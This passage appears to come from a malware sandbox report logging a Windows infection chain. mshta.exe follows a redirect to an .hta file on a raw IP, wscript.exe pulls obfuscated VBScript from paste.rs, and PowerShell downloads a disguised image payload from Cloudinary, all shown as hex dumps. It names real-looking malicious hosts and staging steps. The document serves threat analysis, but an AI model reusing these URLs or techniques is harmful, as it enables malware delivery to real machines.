                                                                                                                    2024-12-11 09:54:18 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                                                    Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                                                    2024-12-11 09:54:18 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                                                    Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                                                    2024-12-11 09:54:18 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                                                    Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                                                    2024-12-11 09:54:18 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                                                    Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                                                                    2024-12-11 09:54:18 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                                    Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                                                    2024-12-11 09:54:18 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                                    Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                                                    2024-12-11 09:54:18 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                                    Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                                    2024-12-11 09:54:18 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                                    Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.224917054.150.207.1314432556C:\Windows\System32\mshta.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 09:54:21 UTC429OUTGET /wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: fr-FR
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: short.ruksk.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-11 09:54:21 UTC487INHTTP/1.1 302 Found
                                                                                                                    Date: Wed, 11 Dec 2024 09:54:21 GMT
                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                    X-DNS-Prefetch-Control: off
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                    X-Download-Options: noopen
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    Location: http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta
                                                                                                                    Vary: Accept
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    Content-Length: 107
                                                                                                                    Connection: close
                                                                                                                    2024-12-11 09:54:21 UTC107INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 32 33 35 2e 32 39 2f 38 30 38 2f 6b 63 63 2f 6e 69 63 65 77 69 74 68 67 72 65 61 74 66 65 61 74 75 72 65 73 72 65 74 75 72 6e 66 6f 72 6d 65 62 65 73 74 74 68 69 6e 67 73 67 69 76 65 6e 73 6f 6f 66 61 72 2e 68 74 61
                                                                                                                    Data Ascii: Found. Redirecting to http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.224917345.63.94.2144433696C:\Windows\System32\wscript.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 09:54:32 UTC320OUTGET /ACRWC HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: paste.rs
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-11 09:54:33 UTC439INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 11 Dec 2024 09:54:33 GMT
                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                    Content-Length: 79694
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    permissions-policy: interest-cohort=()
                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains;
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    2024-12-11 09:54:33 UTC15945INData Raw: 0d 0a 20 20 20 20 0d 0a 5a 68 50 69 43 63 43 63 50 4e 61 7a 69 69 4c 20 3d 20 22 62 6b 57 66 6e 6b 63 4c 62 6c 70 74 48 61 42 22 0d 0a 69 6a 63 75 4e 55 75 4b 43 69 4e 63 57 4f 50 20 3d 20 22 6c 74 55 47 42 7a 47 6f 75 55 7a 6d 57 55 4b 22 0d 0a 53 4b 64 65 6d 6c 5a 66 62 71 42 52 4b 75 61 20 3d 20 22 4b 76 75 61 4b 57 50 47 6d 57 6f 4c 63 5a 78 22 0d 0a 0d 0a 6d 4b 47 57 69 76 6c 4e 50 66 47 69 41 4c 55 20 3d 20 22 4b 55 71 78 68 70 42 4c 74 4b 6d 43 4b 6e 52 22 0d 0a 61 4e 70 4c 75 4f 7a 62 70 72 69 6d 57 57 4a 20 3d 20 22 43 6d 71 4e 6e 4b 4c 64 41 70 4c 49 63 6a 78 22 0d 0a 63 72 55 76 74 70 4c 55 67 50 57 43 57 57 4e 20 3d 20 22 57 63 68 62 76 4c 63 50 6d 50 5a 70 6e 69 68 22 0d 0a 69 4b 70 6b 4b 4b 70 69 50 4c 43 64 69 78 57 20 3d 20 22 65 4c 55 5a
                                                                                                                    Data Ascii: ZhPiCcCcPNaziiL = "bkWfnkcLblptHaB"ijcuNUuKCiNcWOP = "ltUGBzGouUzmWUK"SKdemlZfbqBRKua = "KvuaKWPGmWoLcZx"mKGWivlNPfGiALU = "KUqxhpBLtKmCKnR"aNpLuOzbprimWWJ = "CmqNnKLdApLIcjx"crUvtpLUgPWCWWN = "WchbvLcPmPZpnih"iKpkKKpiPLCdixW = "eLUZ
                                                                                                                    2024-12-11 09:54:33 UTC16384INData Raw: 20 22 6f 57 4c 4c 4b 62 6b 76 74 65 55 69 47 53 47 22 0d 0a 78 65 69 67 47 4b 41 62 7a 42 68 67 4c 4c 51 20 3d 20 22 57 69 47 63 57 6f 52 5a 69 53 41 6b 4c 5a 66 22 0d 0a 4c 57 62 48 74 4c 41 69 6a 4b 55 73 49 57 4e 20 3d 20 22 52 70 57 66 4c 57 53 55 65 6b 41 6f 68 51 4e 22 0d 0a 69 4b 4c 55 7a 5a 6f 68 7a 52 6c 69 63 6c 4e 20 3d 20 22 63 65 74 6d 69 57 4c 57 57 4e 55 75 70 4a 6b 22 0d 0a 4c 63 68 4e 6c 7a 69 70 41 65 78 66 57 6b 76 20 3d 20 22 63 71 6d 4c 64 41 71 49 4c 69 78 68 69 63 64 22 0d 0a 0d 0a 57 48 57 41 4e 4b 57 61 62 76 75 65 66 75 6e 20 3d 20 22 50 69 61 6c 69 42 4f 57 50 6b 42 6d 7a 52 66 22 0d 0a 78 4c 4c 5a 54 63 4c 62 6b 61 68 4f 70 47 5a 20 3d 20 22 50 7a 49 57 4b 4c 52 61 49 50 47 76 4b 47 4b 22 0d 0a 6e 51 78 6a 63 47 7a 41 66 63 4c
                                                                                                                    Data Ascii: "oWLLKbkvteUiGSG"xeigGKAbzBhgLLQ = "WiGcWoRZiSAkLZf"LWbHtLAijKUsIWN = "RpWfLWSUekAohQN"iKLUzZohzRliclN = "cetmiWLWWNUupJk"LchNlzipAexfWkv = "cqmLdAqILixhicd"WHWANKWabvuefun = "PialiBOWPkBmzRf"xLLZTcLbkahOpGZ = "PzIWKLRaIPGvKGK"nQxjcGzAfcL
                                                                                                                    2024-12-11 09:54:33 UTC16384INData Raw: 6b 69 57 50 66 75 6c 57 4f 57 65 22 0d 0a 7a 4c 70 78 6e 63 70 4b 61 69 53 66 63 63 4c 20 3d 20 22 4c 76 68 69 57 62 50 6c 50 55 69 69 4b 66 76 22 0d 0a 68 62 62 50 4c 55 4b 4b 70 4c 74 7a 70 62 6f 20 3d 20 22 42 6d 57 6f 4c 4b 57 70 69 68 4b 4b 61 57 69 22 0d 0a 42 50 63 69 61 57 6b 4c 4f 69 70 4e 66 4c 42 20 3d 20 22 7a 4b 68 53 4c 62 57 6c 6f 47 69 6d 78 55 67 22 0d 0a 70 6f 52 50 41 70 4c 43 69 57 68 69 75 6d 4e 20 3d 20 22 64 69 63 51 70 65 75 5a 6d 4b 41 57 6e 43 4c 22 0d 0a 63 41 47 52 41 48 61 70 62 50 63 5a 69 66 6c 20 3d 20 22 67 4c 52 6e 63 6b 66 57 74 54 5a 62 76 4b 63 22 0d 0a 0d 0a 63 68 43 71 41 63 57 75 66 6b 75 4c 75 57 4c 20 3d 20 22 6a 67 76 70 63 4c 69 6d 75 4c 74 57 50 73 51 22 0d 0a 68 4c 55 68 4c 69 63 41 70 65 68 6c 4b 62 68 20 3d
                                                                                                                    Data Ascii: kiWPfulWOWe"zLpxncpKaiSfccL = "LvhiWbPlPUiiKfv"hbbPLUKKpLtzpbo = "BmWoLKWpihKKaWi"BPciaWkLOipNfLB = "zKhSLbWloGimxUg"poRPApLCiWhiumN = "dicQpeuZmKAWnCL"cAGRAHapbPcZifl = "gLRnckfWtTZbvKc"chCqAcWufkuLuWL = "jgvpcLimuLtWPsQ"hLUhLicApehlKbh =
                                                                                                                    2024-12-11 09:54:33 UTC16384INData Raw: 61 65 43 6b 71 4f 63 4b 42 7a 6d 20 3d 20 22 57 71 57 66 4f 62 61 74 57 4b 6b 4c 72 65 76 22 0d 0a 66 41 5a 61 4e 65 69 4c 63 65 50 42 57 65 63 20 3d 20 22 57 69 69 4e 57 6d 4c 4c 4b 54 47 52 55 42 47 22 0d 0a 74 4c 51 73 7a 4c 4e 42 41 55 4a 57 65 4b 7a 20 3d 20 22 48 4b 78 7a 53 6b 61 64 6b 4c 52 74 69 4c 4f 22 0d 0a 4b 55 4c 55 57 68 69 69 42 4b 6e 4f 7a 6d 4e 20 3d 20 22 4c 6e 72 47 72 66 4c 4c 66 63 74 68 4c 4c 57 22 0d 0a 0d 0a 71 4c 4a 6e 48 63 6c 69 65 6f 4a 6c 6f 5a 47 20 3d 20 22 70 47 47 65 4a 63 4c 57 49 4f 6d 4f 62 5a 65 22 0d 0a 47 65 42 65 61 71 4e 72 6b 7a 4c 6d 62 4f 4b 20 3d 20 22 43 41 66 67 42 57 74 6a 48 7a 57 6d 61 74 6f 22 0d 0a 67 47 47 43 64 71 47 62 4e 75 6b 70 4f 4b 66 20 3d 20 22 4b 71 4c 62 6f 52 74 68 69 47 69 69 42 75 6d 22
                                                                                                                    Data Ascii: aeCkqOcKBzm = "WqWfObatWKkLrev"fAZaNeiLcePBWec = "WiiNWmLLKTGRUBG"tLQszLNBAUJWeKz = "HKxzSkadkLRtiLO"KULUWhiiBKnOzmN = "LnrGrfLLfcthLLW"qLJnHclieoJloZG = "pGGeJcLWIOmObZe"GeBeaqNrkzLmbOK = "CAfgBWtjHzWmato"gGGCdqGbNukpOKf = "KqLboRthiGiiBum"
                                                                                                                    2024-12-11 09:54:33 UTC14597INData Raw: 75 4e 64 68 50 4e 78 5a 47 5a 7a 50 4c 50 22 0d 0a 71 6b 69 69 70 70 55 4b 70 4c 64 50 4c 4b 68 20 3d 20 22 6c 55 52 69 62 70 6b 63 54 6e 63 57 6c 6d 63 22 0d 0a 5a 4c 41 57 57 63 50 4c 69 75 4c 6f 5a 43 6f 20 3d 20 22 6c 50 70 54 71 41 64 6b 43 49 63 65 4c 55 4b 22 0d 0a 70 70 55 73 57 55 62 7a 5a 4c 4c 71 4b 55 7a 20 3d 20 22 66 55 48 42 6f 55 57 7a 6b 41 69 50 41 47 66 22 0d 0a 0d 0a 49 47 70 4e 4e 67 43 55 5a 62 50 4b 4c 70 69 20 3d 20 22 6f 74 6e 57 4b 4c 57 47 4c 61 4b 6e 4c 64 6b 22 0d 0a 6b 5a 4c 63 5a 52 4e 6f 6d 7a 50 65 71 68 66 20 3d 20 22 68 47 4c 55 70 57 50 4b 6e 57 6d 66 71 4b 75 22 0d 0a 57 43 6b 66 54 62 52 68 70 74 47 69 4b 51 4a 20 3d 20 22 64 5a 4b 49 69 5a 50 61 63 69 57 6d 6b 55 7a 22 0d 0a 57 4b 63 55 6d 6f 6c 57 48 4c 57 57 64 65
                                                                                                                    Data Ascii: uNdhPNxZGZzPLP"qkiippUKpLdPLKh = "lURibpkcTncWlmc"ZLAWWcPLiuLoZCo = "lPpTqAdkCIceLUK"ppUsWUbzZLLqKUz = "fUHBoUWzkAiPAGf"IGpNNgCUZbPKLpi = "otnWKLWGLaKnLdk"kZLcZRNomzPeqhf = "hGLUpWPKnWmfqKu"WCkfTbRhptGiKQJ = "dZKIiZPaciWmkUz"WKcUmolWHLWWde


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.2249174151.101.1.1374433912C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-11 09:54:36 UTC127OUTGET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                                                                                                                    Host: res.cloudinary.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2024-12-11 09:54:37 UTC750INHTTP/1.1 200 OK
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 2230233
                                                                                                                    Content-Type: image/jpeg
                                                                                                                    Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
                                                                                                                    Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
                                                                                                                    Date: Wed, 11 Dec 2024 09:54:37 GMT
                                                                                                                    Strict-Transport-Security: max-age=604800
                                                                                                                    Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                                                    Server-Timing: cld-fastly;dur=2;cpu=1;start=2024-12-11T09:54:37.154Z;desc=hit,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)"
                                                                                                                    Server: Cloudinary
                                                                                                                    Timing-Allow-Origin: *
                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                    x-request-id: 6f487a4c60d72621f2efeecff85ca20a
                                                                                                                    2024-12-11 09:54:37 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                    Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                    2024-12-11 09:54:37 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                                                    Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
